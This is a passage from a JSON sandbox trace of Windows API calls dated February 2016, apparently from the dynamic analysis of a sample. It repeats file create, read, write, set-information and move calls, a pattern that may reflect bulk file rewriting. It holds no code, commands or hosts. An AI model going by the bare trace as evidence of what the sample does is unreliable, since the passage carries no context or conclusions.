"2016-02-16 17:41:52,307", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,307", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,307", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,307", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,307", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,307", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,307", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,307", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,307", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,307", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,307", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,327", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,327", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,327", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,327", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,327", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,327", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,327", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,327", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,337", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,337", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,337", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,337", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,337", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,337", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,337", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,337", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,337", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,337", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,337", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,337", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,337", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,347", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,347", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,347", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,347", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,347", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,347", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,347", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,347", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,347", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,347", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,347", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,347", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,347", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,357", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,357", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,357", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,357", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,357", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,357", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,357", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,357", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,357", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,357", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,357", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,367", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,367", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,367", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,367", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,367", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,367", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,367", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,367", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,367", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,367", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,367", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,367", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,367", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,377", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,377", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,377", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,377", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,377", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,377", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,377", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,377", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,377", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,377", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,377", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,377", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,377", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,387", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,387", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,387", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,387", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,387", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,387", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,387", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,387", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,387", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,387", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,387", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,387", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,397", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,397", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,397", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,397", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,397", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,418", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,418", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,418", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,428", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,428", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,428", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,428", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,428", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,428", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,428", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,428", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,438", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,438", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,438", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,438", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,438", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,438", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,438", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,438", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,438", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,438", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,438", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,438", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,438", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,448", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,448", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,448", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,448", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,448", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,448", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,448", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,448", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,448", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,448", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,448", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,458", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,458", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,458", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,458", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,458", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,458", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,458", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,458", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,458", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,458", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,458", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,458", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,458", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,458", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,458", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,468", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,468", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,468", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,468", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,468", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,468", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,468", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,468", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,468", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,468", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,468", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,468", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,478", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,478", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,478", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,478", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,478", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,478", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,478", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,478", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,478", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,488", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,488", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,488", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,488", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,488", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,488", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,488", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,488", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,498", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,498", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,498", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,498", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,498", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,498", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,498", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,498", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,498", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,508", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,508", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,508", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,508", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,508", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,508", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,508", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,508", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,508", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,508", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,508", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,528", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,528", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,528", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,528", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,538", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,538", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,538", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,538", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,538", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,538", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,538", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,538", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,538", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,538", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,538", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,538", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,548", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,548", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,548", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,548", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,548", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,548", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,548", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,548", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,548", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,558", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,558", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,558", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,558", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,558", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,558", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,558", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,558", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,568", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,568", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,568", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,568", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,568", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,568", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,568", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,568", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,578", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,578", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,578", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,578", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,578", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,578", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,578", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,578", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,578", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,578", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,578", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,578", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,578", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,588", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,588", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,588", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,588", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,588", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,588", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,588", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,588", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,588", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,588", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,588", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,598", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,598", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,598", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,598", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,598", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,598", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,598", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,598", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,608", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,608", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,608", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,608", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,608", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,608", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,608", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,608", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,608", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,608", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,608", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,608", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,608", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,608", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,618", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,618", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,618", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,618", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,618", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,618", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,618", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,618", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,618", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,618", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,628", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,628", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,628", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,628", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,628", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,628", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,628", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,628", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,628", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,628", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,628", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,628", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,628", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,638", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,638", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,638", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,638", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,638", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,638", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,638", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,638", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,638", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,638", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,638", "api": 